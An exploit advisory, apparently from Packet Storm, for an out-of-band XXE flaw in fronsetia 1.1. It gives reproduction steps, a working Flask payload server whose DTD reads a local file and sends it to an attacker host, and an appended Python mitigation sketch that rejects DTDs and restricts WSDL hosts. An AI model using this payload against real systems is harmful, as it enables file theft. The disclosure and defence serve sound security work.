
fronsetia 1.1 XML Injection

fronsetia version 1.1 suffers from an XML external entity injection vulnerability.

Packet Storm
# Exploit Title: XXE OOB - fronsetia v1.1
# Date: 11/2024
# Exploit Author: Andrey Stoykov
# Version: 1.1
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-15-oob-xxe.html

XXE OOB

Description:
- It was found that the application was vulnerable to XXE (XML External Entity Injection)

Steps to Reproduce:
1. Add Python3 server to serve malicious XXE payload
2. Add a file on the file system to be read via the application XXE payload
echo 123123 > /tmp/123
3. Enter the following URL as input
http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl

// Python Server Code
from flask import Flask, Response, request
import logging

app = Flask(__name__)

# Set up logging
logging.basicConfig(level=logging.DEBUG)

@app.route('/testxxeService', defaults={'path': ''})
def catch_all(path):
    app.logger.debug("Serving XXE payload")
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml', status=200)

@app.route('/data.dtd', defaults={'path': ''})
def hello(path):
    app.logger.debug("DTD requested")
    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">
%eval;
%exfil;"""
    return Response(xml, mimetype='text/xml', status=200)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)
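Mitigation sketch for the issue above, added here as an example (not code from the advisory or from fronsetia): restrict where the Fronsetia_WSDL parameter may point, and refuse any fetched document that declares a DTD or entity before it reaches the real parser. The allowlisted host, the function names and the sample documents are assumptions constructed for illustration.

```python
import xml.parsers.expat
from urllib.parse import urlsplit

# Assumption: hosts this deployment legitimately loads WSDLs from.
ALLOWED_WSDL_HOSTS = {"services.example.internal"}
# Constructed samples: a plain WSDL stub and one declaring an external parameter entity.
CLEAN = b'<?xml version="1.0"?><definitions name="demo"/>'
WITH_DTD = (b'<?xml version="1.0"?><!DOCTYPE data ['
            b'<!ENTITY % dtd SYSTEM "http://dtd.example.invalid/data.dtd"> %dtd;]>'
            b'<data/>')


class UnsafeXML(ValueError):
    """Raised when a document declares a DTD or any entity."""


def wsdl_url_allowed(url):
    """Accept only http(s) URLs whose host is on the allowlist."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and parts.hostname in ALLOWED_WSDL_HOSTS


def reject_dtd(xml_bytes):
    """Return the root element name, or raise UnsafeXML at the first DTD construct."""
    root = []

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE declaration not allowed: {name!r}")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity declaration not allowed: {name!r}")

    def forbid_external_ref(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity reference not allowed: {sysid!r}")

    def start(name, attrs):
        if not root:
            root.append(name)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external_ref
    parser.StartElementHandler = start
    parser.Parse(xml_bytes, True)  # handler exceptions propagate out of Parse
    return root[0]
```

In a Java application such as this one, the equivalent control is to disable DOCTYPE declarations on the XML parser factory (for Xerces-based parsers, the http://apache.org/xml/features/disallow-doctype-decl feature).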
